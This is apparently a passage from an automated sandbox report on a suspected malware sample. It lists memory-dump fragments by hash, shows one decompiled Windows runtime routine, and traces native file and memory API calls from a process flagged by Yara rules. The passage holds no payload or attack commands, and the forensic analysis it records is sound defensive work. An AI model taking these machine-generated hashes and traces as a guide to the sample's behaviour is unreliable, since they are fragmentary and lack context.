                                  • Opcode Fuzzy Hash: 037566b32da9c2469b4a8817a30aaea183211b3253ac237e018fc30fb72df9dd
                                  • Instruction Fuzzy Hash: CD9002A2601140434541B1E958144165015B7E1341391C121A0444564CC6E88855A2A5
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7a88a2ebd4c98ce8ef94695a88230f3b24f2717413ff4c11bc16b8c12d17be93
                                  • Instruction ID: e3dbb18bb5507a05b9052ebad6b282dc0059866f054d924991c68928c498162c
                                  • Opcode Fuzzy Hash: 7a88a2ebd4c98ce8ef94695a88230f3b24f2717413ff4c11bc16b8c12d17be93
                                  • Instruction Fuzzy Hash: 2A90027220144002D14171E9945461B5005B7E0341F51C411E0415558CC6958856A261
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7c0007373d8c445a3a65a37fb975e620bf11aa1942a62bc05c682f27ad9ecf23
                                  • Instruction ID: 0be60ffed09affb24272ffdf8134bffec40009cc09de6190bb0d5d62e8963aa8
                                  • Opcode Fuzzy Hash: 7c0007373d8c445a3a65a37fb975e620bf11aa1942a62bc05c682f27ad9ecf23
                                  • Instruction Fuzzy Hash: D390026224100802D14171E994247170006E7D0741F51C011A0014558DC696896576F1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 2f65ffd1d3e281dc7256715cfb62b5622a5f724dea2a5e7bf92a7b5bf023ce6a
                                  • Instruction ID: f61e8c1906fd427498884f97c415c530352609eac086521f44372fd8c9cd28db
                                  • Opcode Fuzzy Hash: 2f65ffd1d3e281dc7256715cfb62b5622a5f724dea2a5e7bf92a7b5bf023ce6a
                                  • Instruction Fuzzy Hash: 1D90026220144442D14162E95814B1F4105A7E1342F91C019A4146558CC99588556761
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f0eccc9d04219be91a4d3cce84cfbdbe177851dc58297cfd7979fe5b07d4022b
                                  • Instruction ID: 190453ef0ffd0545ecf459bbebbc53ba32f1605af9544bf3f4f165a5a772fc9e
                                  • Opcode Fuzzy Hash: f0eccc9d04219be91a4d3cce84cfbdbe177851dc58297cfd7979fe5b07d4022b
                                  • Instruction Fuzzy Hash: 5190027220140402D10161E958187570005A7D0342F51C011A5154559EC6E5C8917571
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 7f1fec6ec4ec552009b395ab7c5b9cb5e22529d52b43b245d38edfd5d357fdde
                                  • Instruction ID: fbb0008e6347cbeaff63deac8a1e760027880b54e82fd1c6667b747770d21db9
                                  • Opcode Fuzzy Hash: 7f1fec6ec4ec552009b395ab7c5b9cb5e22529d52b43b245d38edfd5d357fdde
                                  • Instruction Fuzzy Hash: 0990027220100802D10561E958146960005A7D0341F51C011A6014659ED6E588917171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a7f614416d95ce32ff079c6f13fc3abd660cd4913ebd6a1849211617e687d882
                                  • Instruction ID: 1e0a1f35461e85dd0dc83fa020aacb0c785bd72e95bd9f5f287b2866af627371
                                  • Opcode Fuzzy Hash: a7f614416d95ce32ff079c6f13fc3abd660cd4913ebd6a1849211617e687d882
                                  • Instruction Fuzzy Hash: C7900272A0500012914171E958246564006B7E0781B55C011A0504558CC9D48A5563E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ee0c37ab39040735a81b5ea4188c763e13e763b2149ae8846f0a0621c125abe4
                                  • Instruction ID: bcc50ccb055efc8829e6f4e74baa14efa68b752135500f8d0b1368138628b2c4
                                  • Opcode Fuzzy Hash: ee0c37ab39040735a81b5ea4188c763e13e763b2149ae8846f0a0621c125abe4
                                  • Instruction Fuzzy Hash: 919002E2201140924501A2E99414B1A4505A7E0341B51C016E1044564CC5A58851A175
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 280d97d23346b1e49d7b7f7684fc37f883dc6f4a9c44904f25de44ad2941f780
                                  • Instruction ID: f358e915ed8f3ea51bd576858e82eba4e8f9348e32c60604aaeb7567b7a9f4e6
                                  • Opcode Fuzzy Hash: 280d97d23346b1e49d7b7f7684fc37f883dc6f4a9c44904f25de44ad2941f780
                                  • Instruction Fuzzy Hash: 56900266221000020146A5E9161451B0445B7D6391391C015F1406594CC6A188656361
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a11201e4f4942a95e27cadc63895245fa1a94c9a89bb7ee3a2d5c99608ec290d
                                  • Instruction ID: 1054d16ebb42f91fd8dde3c632fa2b86647d9ca8a939f4de5a52614f4dea3a5e
                                  • Opcode Fuzzy Hash: a11201e4f4942a95e27cadc63895245fa1a94c9a89bb7ee3a2d5c99608ec290d
                                  • Instruction Fuzzy Hash: 88900272301000529501A6E96814A5A4105A7F0341B51D015A4004558CC5D488616161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a96c17c5d98f236faab72f34915abb8827e77ac98461f7212b6ec588967ee72f
                                  • Instruction ID: 17432ccf0dc2cc7cb719ea6a17496f687a5d8f10da315adfb3e13766124813a1
                                  • Opcode Fuzzy Hash: a96c17c5d98f236faab72f34915abb8827e77ac98461f7212b6ec588967ee72f
                                  • Instruction Fuzzy Hash: 0A90026260500402D14171E964287160015A7D0341F51D011A0014558DC6D98A5576E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7bbb281ae26e1dfaef8ac9accfd31bc0798c27e8d0e5461533f0787e894260d
                                  • Instruction ID: cf250af8d9b5801880c04af3545638538634e7d00ada613b437ae6c7f7aebfe9
                                  • Opcode Fuzzy Hash: b7bbb281ae26e1dfaef8ac9accfd31bc0798c27e8d0e5461533f0787e894260d
                                  • Instruction Fuzzy Hash: 2B90027620504442D50165E96814A970005A7D0345F51D411A041459CDC6D48861B161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f1d473989d3647a4be41e1bc128ff7508dfba1df9570c309e3b641c7e35e7c79
                                  • Instruction ID: dbb45f2374e5ddd36df0af79a584563052392562cd8f0b35a35fae480f4b908b
                                  • Opcode Fuzzy Hash: f1d473989d3647a4be41e1bc128ff7508dfba1df9570c309e3b641c7e35e7c79
                                  • Instruction Fuzzy Hash: CF90026220504442D10165E96418A160005A7D0345F51D011A1054599DC6B58851B171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b443a7e1680c9c4a925c22d25505ec563280442155369c16c6d8186b483b715f
                                  • Instruction ID: 47ef662e7f8b367a29ad5cdfd096d15b047fc9848d5685adac30b961db7fb354
                                  • Opcode Fuzzy Hash: b443a7e1680c9c4a925c22d25505ec563280442155369c16c6d8186b483b715f
                                  • Instruction Fuzzy Hash: 5690027220100403D10161E965187170005A7D0341F51D411A041455CDD6D688517161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8cf03d3773f69624d23c695726a37733a3cf4beded16c58cc325ae165dcf08a3
                                  • Instruction ID: fbab69b7b85db64071730ca561273a58409ea7da915a7f58bc358f821a5f2d3d
                                  • Opcode Fuzzy Hash: 8cf03d3773f69624d23c695726a37733a3cf4beded16c58cc325ae165dcf08a3
                                  • Instruction Fuzzy Hash: 7090027220100842D10161E95414B560005A7E0341F51C016A0114658DC695C8517561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4e4bbae7903462d3809d98f74f1f59ea0bf8c0f92b8f67c28f287236b6dd000c
                                  • Instruction ID: 37c267dc45b762bdcdb18c552bece351f2d7ccb0ecacc9cd4a48ab2f6cb38b40
                                  • Opcode Fuzzy Hash: 4e4bbae7903462d3809d98f74f1f59ea0bf8c0f92b8f67c28f287236b6dd000c
                                  • Instruction Fuzzy Hash: AE90027260500802D15171E954247560005A7D0341F51C011A0014658DC7D58A5576E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: aa2ff945040e2b28c91e2a8da68f206eae94a3b2c77188c869e68fa27d576f97
                                  • Instruction ID: e40e055a7fcb5db66a9b017a8a3edcb18ec7d09762c5d364aeb3b5ed2b4f72fd
                                  • Opcode Fuzzy Hash: aa2ff945040e2b28c91e2a8da68f206eae94a3b2c77188c869e68fa27d576f97
                                  • Instruction Fuzzy Hash: BF90027220504842D14171E95414A560015A7D0345F51C011A0054698DD6A58D55B6A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction ID: 218667d15e3643d0ff191de9174fdd0dab3935863ff56486c230f89e3b48fb3d
                                  • Opcode Fuzzy Hash: a3d3d3c0123cddb368cc51eab9da9c3aaeeac76cd7bbfae310620ba6f7f49b43
                                  • Instruction Fuzzy Hash:
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 53%
                                  			E01A4FDDA(intOrPtr* __edx, intOrPtr _a4) {
                                  				void* _t7;
                                  				intOrPtr _t9;
                                  				intOrPtr _t10;
                                  				intOrPtr* _t12;
                                  				intOrPtr* _t13;
                                  				intOrPtr _t14;
                                  				intOrPtr* _t15;
                                  
                                  				_t13 = __edx;
                                  				_push(_a4);
                                  				_t14 =  *[fs:0x18];
                                  				_t15 = _t12;
                                  				_t7 = E019FCE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                  				_push(_t13);
                                  				E01A45720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                  				_t9 =  *_t15;
                                  				if(_t9 == 0xffffffff) {
                                  					_t10 = 0;
                                  				} else {
                                  					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                  				}
                                  				_push(_t10);
                                  				_push(_t15);
                                  				_push( *((intOrPtr*)(_t15 + 0xc)));
                                  				_push( *((intOrPtr*)(_t14 + 0x24)));
                                  				return E01A45720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                  			}











                                  APIs
                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 01A4FDFA
                                  Strings
                                  • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 01A4FE01
                                  • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 01A4FE2B
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.308202420.0000000001990000.00000040.00000001.sdmp, Offset: 01990000, based on PE: true
                                  Similarity
                                  • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                  • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                  • API String ID: 885266447-3903918235
                                  • Opcode ID: a316eb0a9daf34c14d2a34b0f0964cb1e41a90c1e00277554462409966b0c214
                                  • Instruction ID: 3e8f8afa15e3c35e0773a2b402c072bcd53cc608ca8393ae6fb928a84b580b58
                                  • Opcode Fuzzy Hash: a316eb0a9daf34c14d2a34b0f0964cb1e41a90c1e00277554462409966b0c214
                                  • Instruction Fuzzy Hash: 5EF0F672640201BFEA201B49DD02F23BF6AEBC4B30F144318F628565D1DA62F82087F0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  Executed Functions

                                  APIs
                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:a,FFFFFFFF,?,r=a,?,00000000), ref: 006186D5
                                  • NtClose.NTDLL(P=a,?,?,00613D50,00000000,FFFFFFFF), ref: 00618735
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileRead
                                  • String ID: P=a
                                  • API String ID: 752142053-3282104018
                                  • Opcode ID: 0d24d278059620e815b43ad25f047fdd73d2e6c9f4eeb68bd90787b8b3011962
                                  • Instruction ID: 5889f5f769e160cf78f7d467e4ff640e0232ef1a921d41f9dee07909f168b52d
                                  • Opcode Fuzzy Hash: 0d24d278059620e815b43ad25f047fdd73d2e6c9f4eeb68bd90787b8b3011962
                                  • Instruction Fuzzy Hash: 8AF03CB6204108ABC714EF98DC85DEB77ADEF8C350F148658FA1C97201C630EA518BE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00613BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00613BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0061862D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction ID: a1781c82fa8840eaec4f9ab0fa4eaefd4d9e6ba9cbd3ed1fe38da9a03d8a495a
                                  • Opcode Fuzzy Hash: 19fa48ade07888cfcca4191431b874d7c75bcaabbd4d52727e7364b5df5f6853
                                  • Instruction Fuzzy Hash: 24F0BDB2204208ABCB48CF89DC95EEB77ADAF8C754F158248FA0D97241C630E851CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtCreateFile.NTDLL(00000060,00000000,.z`,00613BB7,00000000,FFFFFFFF,?,?,FFFFFFFF,00000000,00613BB7,007A002E,00000000,00000060,00000000,00000000), ref: 0061862D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: CreateFile
                                  • String ID: .z`
                                  • API String ID: 823142352-1441809116
                                  • Opcode ID: 376b76feb21824fa48789a8f80c8a437da893c14e663adeb08cbf43f4dd1fed7
                                  • Instruction ID: a68fc28848306ade3778f8a757e12cec5c298d1cb2fe190bed04faf2475e6b5c
                                  • Opcode Fuzzy Hash: 376b76feb21824fa48789a8f80c8a437da893c14e663adeb08cbf43f4dd1fed7
                                  • Instruction Fuzzy Hash: 49F019B6204188ABCB08CF98D885CEB77A9EF8C350B15864DF90D93202C634E851CBA0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtReadFile.NTDLL(?,?,FFFFFFFF,?,?,?,?,?,1:a,FFFFFFFF,?,r=a,?,00000000), ref: 006186D5
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: FileRead
                                  • String ID: 1:a
                                  • API String ID: 2738559852-3321157890
                                  • Opcode ID: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction ID: 7ea71cd326acf2e8c97840684ab2ebc87ee1be6c073fac9550cf62ca3f73145d
                                  • Opcode Fuzzy Hash: 1cb0ad745fa17a6b0f92d1251f92e59420b1dcb8c70dd00eb84f7822971f7938
                                  • Instruction Fuzzy Hash: D9F0A4B2200208ABCB14DF89DC95EEB77ADAF8C754F158248BA1D97241D630E951CBA4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtClose.NTDLL(P=a,?,?,00613D50,00000000,FFFFFFFF), ref: 00618735
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: Close
                                  • String ID: P=a
                                  • API String ID: 3535843008-3282104018
                                  • Opcode ID: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction ID: 3173affc9ceda7940ba423c8ebd81e142da28421744d880b2c3d6d5c584a73d7
                                  • Opcode Fuzzy Hash: aa41620b67aec822f8463caeb84bd84f714cc802f2fd34de09a1d76353dd2617
                                  • Instruction Fuzzy Hash: 8DD01776200214BBD710EB99CC8AEE77BADEF48760F154499BA189B242C530FA40C6E0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00602D11,00002000,00003000,00000004), ref: 006187F9
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction ID: 8ce824e0d6febe892b93c5882f1ae8b71c3aae94082c458567733db680103af1
                                  • Opcode Fuzzy Hash: e868ca870ba9ad3aee1a8e1804f154c56992d5df3b6804a08460a29a32ddb2bb
                                  • Instruction Fuzzy Hash: 61F015B2200208ABCB14DF89CC81EEB77ADAF88750F158148FE0897241C630F910CBB4
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • NtAllocateVirtualMemory.NTDLL(00000004,00003000,00002000,00000000,?,00602D11,00002000,00003000,00000004), ref: 006187F9
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.499680776.0000000000600000.00000040.00020000.sdmp, Offset: 00600000, based on PE: false
                                  Yara matches
                                  Similarity
                                  • API ID: AllocateMemoryVirtual
                                  • String ID:
                                  • API String ID: 2167126740-0
                                  • Opcode ID: 51c6d38799eb268339bbd3e0212be234a1c0dc86b54acad45c80b6b8f55061c8
                                  • Instruction ID: 6f2c13684154f158ff7f136bb576f3926862db2f4fc764ec24e899ff73699062
                                  • Opcode Fuzzy Hash: 51c6d38799eb268339bbd3e0212be234a1c0dc86b54acad45c80b6b8f55061c8
                                  • Instruction Fuzzy Hash: 51F0F2B6204209ABCB14DF89DC85EEB77A9AF88354F158658FE0897241C630E910CBE0
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 3effe4eb6e29522976444f54f26212e990d4b17d99a8ee6de5fcdcd0c6528b7e
                                  • Instruction ID: 8eeeab172788e2349b7d5cca996a8edc8268645d6ce0f33813dde3fc3ea2ea4b
                                  • Opcode Fuzzy Hash: 3effe4eb6e29522976444f54f26212e990d4b17d99a8ee6de5fcdcd0c6528b7e
                                  • Instruction Fuzzy Hash: F5900265211000072225A5590704507004697D9395351C039F10065A0CD661D8657161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 91e8079fa14b1e9541cb403dfca58a2c14f5b6a5e09e99d87c60451fe5c58820
                                  • Instruction ID: d4ffcbddf5567a0ad05e0088a5a09573c7925b5221b713409962b18847dcf401
                                  • Opcode Fuzzy Hash: 91e8079fa14b1e9541cb403dfca58a2c14f5b6a5e09e99d87c60451fe5c58820
                                  • Instruction Fuzzy Hash: 369002A120200007622571594414616400A97E4345B51C039E10055E0DC565D8957165
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b69ca82761dcde6467096ba7509e431e72b2aa9c1221265620ae7c5ca1273a2c
                                  • Instruction ID: e2ebc6d13ddd2c3555b0d5b6ace76b16ab4ce6502b7bdddd9427041e2d62a840
                                  • Opcode Fuzzy Hash: b69ca82761dcde6467096ba7509e431e72b2aa9c1221265620ae7c5ca1273a2c
                                  • Instruction Fuzzy Hash: 6790027120100806F2A07159440464A000597D5345F91C03DA00166A4DCA55DA5D77E1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: cdcd8d0244fdd1a29821718e01b3064bb792e82d92a7ac5fbe4eafa21fad8e4c
                                  • Instruction ID: e2e659e8be762d2ef066e00ee404ecb686c7345785f027bb2597cbe02a6b9e1f
                                  • Opcode Fuzzy Hash: cdcd8d0244fdd1a29821718e01b3064bb792e82d92a7ac5fbe4eafa21fad8e4c
                                  • Instruction Fuzzy Hash: 7190027120504846F26071594404A46001597D4349F51C039A00556E4D9665DD59B6A1
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 12f35ea6544bb0a5e21d2814312e2a62e02a261673e83c16b96961b14fcf0ff0
                                  • Instruction ID: 69e44f6e7817ab99bfd65daee97e561c2abcdafa27927e0766b356fc56997998
                                  • Opcode Fuzzy Hash: 12f35ea6544bb0a5e21d2814312e2a62e02a261673e83c16b96961b14fcf0ff0
                                  • Instruction Fuzzy Hash: B590027120108806F2306159840474A000597D4345F55C439A44156A8D86D5D8957161
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: afec0b7b4e418dfff8833b4baa3d8fdddfaef65b9a915050b3a76f04e7b8716a
                                  • Instruction ID: 3c2d8747ff6214a4a5484eb0a2b47070ed965d269f0c072d0aa4274c7b6b05e9
                                  • Opcode Fuzzy Hash: afec0b7b4e418dfff8833b4baa3d8fdddfaef65b9a915050b3a76f04e7b8716a
                                  • Instruction Fuzzy Hash: 3390027120100846F22061594404B46000597E4345F51C03EA01156A4D8655D8557561
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: 1442d9db6974fb48e970959a9e1f81ff37497a2f4d8a8f9b0a49329c0a5caae7
                                  • Instruction ID: 6989424da6f28c5472c0dacbf2ac913bffd7981ab99aff1d4b6c18d6d19873ab
                                  • Opcode Fuzzy Hash: 1442d9db6974fb48e970959a9e1f81ff37497a2f4d8a8f9b0a49329c0a5caae7
                                  • Instruction Fuzzy Hash: 4890027120100406F22065995408646000597E4345F51D039A50155A5EC6A5D8957171
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c0a42f36252e33139bc4303175da588a79b8875d14e7f8444dba93a8f6c64862
                                  • Instruction ID: 7551ae081f286ee279f1efb6b8fea765a1a778bc881579e7c25a21876e51fabe
                                  • Opcode Fuzzy Hash: c0a42f36252e33139bc4303175da588a79b8875d14e7f8444dba93a8f6c64862
                                  • Instruction Fuzzy Hash: C990027131114406F23061598404706000597D5345F51C439A08155A8D86D5D8957162
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  Memory Dump Source
                                  • Source File: 00000010.00000002.503908034.0000000004750000.00000040.00000001.sdmp, Offset: 04750000, based on PE: true
                                  • Associated: 00000010.00000002.506549814.000000000486B000.00000040.00000001.sdmp
                                  • Associated: 00000010.00000002.506569206.000000000486F000.00000040.00000001.sdmp
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: d404328e1fac90a21f31535b6a7c40d3b59b6155e63acaaf00ee8134cb2f1bdd
